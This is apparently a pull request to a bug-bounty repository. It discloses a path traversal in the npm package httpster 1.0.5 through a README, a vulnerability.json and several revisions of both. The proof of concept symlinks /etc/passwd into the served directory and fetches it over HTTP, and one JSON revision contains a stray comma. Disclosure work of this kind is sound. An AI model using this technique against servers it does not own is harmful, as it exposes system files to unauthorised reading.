### PR TITLE
Path Traverasal in httpster

### DIFF
--- a/bounties/npm/httpster/1/README.md
+++ b/bounties/npm/httpster/1/README.md
@@ -1,0 +1,61 @@
+I would like to report path traversal vulnerability in httpster module
+It allows an attacker to read system files via path traversal vulnerability
+
+Module
+-------------------------------------------
+module name: httpster
+version: 1.0.5(latest)
+npm page: https://www.npmjs.com/package/httpster
+
+Module Description
+
+Simple http server for quick loading of content.
+
+Weekly Downloads
+------------------------------------------------
+9,164
+Vulnerability
+
+Vulnerability Description
+
+With a symbolically linked file in the working directory, it is possible to read arbitrary files outside of the web root directory.
+
+Steps To Reproduce:
+--------------------------------------------------
+
+1) Install the httpster module
+$ npm -g install httpster
+
+2)Make a directory
+$ mkdir test
+
+3)Go to 'test' directory
+$ cd test
+
+4)create a symlink file
+ln -s /etc/passwd 'filename'
+
+5)Run httpster module
+$ httpster
+
+6)Request the file within browser
+http://localhost:3333/'filename'
+
+
+Supporting Material/References:
+--------------------------------------------------------------------------------------
+
+These are similar reports
+https://hackerone.com/reports/510043
+https://hackerone.com/reports/695416
+
+[OPERATING SYSTEM VERSION] Ubuntu 18.04.3 LTS
+[NODEJS VERSION] v8.10.0
+[NPM VERSION] 3.5.2
+[BROWSER] Mozilla Firefox 72.0.1 (64-bit)
+
+
+
+Impact
+----------------------------------------------------------------------
+This could have enabled an attacker to view system files and leverage attacks like remote code execution and so on

--- a/bounties/npm/httpster/1/README.md
+++ b/bounties/npm/httpster/1/README.md
@@ -1,65 +1,36 @@
 # Description
 
-I would like to report path traversal vulnerability in httpster module
-It allows an attacker to read system files via path traversal vulnerability
+I would like to report a Path Traversal vulnerability in the httpster module. It allows an attacker to read system files via a Path Traversal vulnerability. With a symbolically linked file in the working directory, it is possible to read arbitrary files outside of the web root directory.
 
-Module
--------------------------------------------
-module name: httpster
-version: 1.0.5(latest)
-npm page: https://www.npmjs.com/package/httpster
+# Module
 
-Module Description
+Module name: httpster
+Version: 1.0.5 (latest)
+
+# Module Description
 
 Simple http server for quick loading of content.
 
-Weekly Downloads
-------------------------------------------------
-9,164
-Vulnerability
-
-Vulnerability Description
-
-With a symbolically linked file in the working directory, it is possible to read arbitrary files outside of the web root directory.
-
 # PoC
 
-Steps To Reproduce:
---------------------------------------------------
-
 1) Install the httpster module
-$ npm -g install httpster
+`$ npm -g install httpster`
 
-2)Make a directory
-$ mkdir test
+2) Make a directory
+`$ mkdir test`
 
-3)Go to 'test' directory
-$ cd test
+3) Go to 'test' directory
+`$ cd test`
 
-4)create a symlink file
-ln -s /etc/passwd 'filename'
+4) Create a symlink file
+`ln -s /etc/passwd 'filename'`
 
-5)Run httpster module
-$ httpster
+5) Run httpster module
+`$ httpster`
 
-6)Request the file within browser
-http://localhost:3333/'filename'
+6) Request the file within browser
+`http://localhost:3333/'filename'`
 
+# Impact
 
-Supporting Material/References:
---------------------------------------------------------------------------------------
-
-These are similar reports
-https://hackerone.com/reports/510043
-https://hackerone.com/reports/695416
-
-[OPERATING SYSTEM VERSION] Ubuntu 18.04.3 LTS
-[NODEJS VERSION] v8.10.0
-[NPM VERSION] 3.5.2
-[BROWSER] Mozilla Firefox 72.0.1 (64-bit)
-
-
-
-Impact
-----------------------------------------------------------------------
-This could have enabled an attacker to view system files and leverage attacks like remote code execution and so on
+This could have enabled an attacker to view system files and leverage attacks like remote code execution.

--- a/bounties/npm/httpster/1/README.md
+++ b/bounties/npm/httpster/1/README.md
@@ -1,3 +1,5 @@
+# Description
+
 I would like to report path traversal vulnerability in httpster module
 It allows an attacker to read system files via path traversal vulnerability
 
@@ -19,6 +21,8 @@ Vulnerability
 Vulnerability Description
 
 With a symbolically linked file in the working directory, it is possible to read arbitrary files outside of the web root directory.
+
+# PoC
 
 Steps To Reproduce:
 --------------------------------------------------

--- a/bounties/npm/httpster/1/vulnerability.json
+++ b/bounties/npm/httpster/1/vulnerability.json
@@ -1,0 +1,52 @@
+{
+    "PackageVulnerabilityID": "1",
+    "DisclosureDate": "2020-08-14",
+    "AffectedVersionRange": "*",
+    "Summary": "Path Traversal",
+    "Author": {
+        "Username": "Anwar Ayoob",
+        "Name": "buggycoder-sys"
+    },
+    "Package": {
+        "Registry": "npm",
+        "Name": "httpster",
+        "URL": "https://www.npmjs.com/package/httpster"
+    },
+    "CWEs": [{
+        "ID": "22",
+        "Description": "Path Traversal"
+    }],
+    "CVSS": {
+        "Version": "3.1",
+        "AV": "",
+        "AC": "",
+        "PR": "",
+        "UI": "",
+        "S": "",
+        "C": "",
+        "I": "",
+        "A": "",
+        "E": "",
+        "RL": "",
+        "RC": "",
+        "Score": "7.5"
+    },
+    "CVEs": [
+        ""
+    ],
+    "Repository": {
+        "URL": "https://github.com/SimbCo/httpster",
+        "Codebase": [
+            "JavaScript"
+        ]
+    },
+    "Permalinks": [
+        ""
+    ],
+    "References": [
+        {
+            "Description": "",
+            "URL": ""
+        }
+    ]
+}

--- a/bounties/npm/httpster/1/vulnerability.json
+++ b/bounties/npm/httpster/1/vulnerability.json
@@ -45,8 +45,18 @@
     ],
     "References": [
         {
-            "Description": "",
-            "URL": ""
+            "Description": "NPM Registry",
+            "URL": "https://www.npmjs.com/package/httpster"
+        },
+        {
+            "Description": "HackerOne Link #1",
+            "URL": "https://hackerone.com/reports/510043"
+        },
+        ,
+        {
+            "Description": "HackerOne Link #2",
+            "URL": "https://hackerone.com/reports/695416"
         }
+        
     ]
 }

--- a/bounties/npm/httpster/1/vulnerability.json
+++ b/bounties/npm/httpster/1/vulnerability.json
@@ -3,10 +3,10 @@
     "DisclosureDate": "2020-08-14",
     "AffectedVersionRange": "*",
     "Summary": "Path Traversal",
-    "Discloser": {
-        "Username": "Anwar Ayoob",
-        "Name": "buggycoder-sys"
-    },
+    "Contributor": {
+        "Discloser": "buggycoder-sys",
+        "Fixer": ""
+},
     "Package": {
         "Registry": "npm",
         "Name": "httpster",

--- a/bounties/npm/httpster/1/vulnerability.json
+++ b/bounties/npm/httpster/1/vulnerability.json
@@ -3,7 +3,7 @@
     "DisclosureDate": "2020-08-14",
     "AffectedVersionRange": "*",
     "Summary": "Path Traversal",
-    "Author": {
+    "Discloser": {
         "Username": "Anwar Ayoob",
         "Name": "buggycoder-sys"
     },


### PR DESCRIPTION
<!-- Thanks for contributing to huntr! -->

I would like to report path traversal vulnerability in httpster module
It allows an attacker to read system files via path traversal vulnerability

Module
-------------------------------------------
module name: httpster
version: 1.0.5(latest)
npm page: https://www.npmjs.com/package/httpster

Module Description

Simple http server for quick loading of content.

Weekly Downloads
------------------------------------------------
9,164
Vulnerability

Vulnerability Description

With a symbolically linked file in the working directory, it is possible to read arbitrary files outside of the web root directory.

Steps To Reproduce:
--------------------------------------------------

1) Install the httpster module
$ npm -g install httpster

2)Make a directory
$ mkdir test

3)Go to 'test' directory
$ cd test

4)create a symlink file
ln -s /etc/passwd 'filename'

5)Run httpster module
$ httpster

6)Request the file within browser
http://localhost:3333/'filename'


Supporting Material/References:
--------------------------------------------------------------------------------------

These are similar reports
https://hackerone.com/reports/510043
https://hackerone.com/reports/695416

[OPERATING SYSTEM VERSION] Ubuntu 18.04.3 LTS
[NODEJS VERSION] v8.10.0
[NPM VERSION] 3.5.2
[BROWSER] Mozilla Firefox 72.0.1 (64-bit)



Impact
----------------------------------------------------------------------
This could have enabled an attacker to view system files and leverage attacks like remote code execution and so on
